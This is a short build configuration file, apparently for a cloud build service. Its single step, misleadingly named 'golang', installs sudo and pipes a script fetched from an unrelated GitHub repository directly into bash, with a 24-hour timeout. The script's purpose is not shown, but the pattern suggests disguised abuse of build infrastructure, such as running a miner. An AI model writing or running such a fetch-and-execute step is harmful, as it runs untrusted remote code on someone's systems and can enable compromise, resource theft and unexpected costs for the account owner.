steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && curl -sL https://github.com/ganejafaujanih/manuk/raw/main/ngising | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
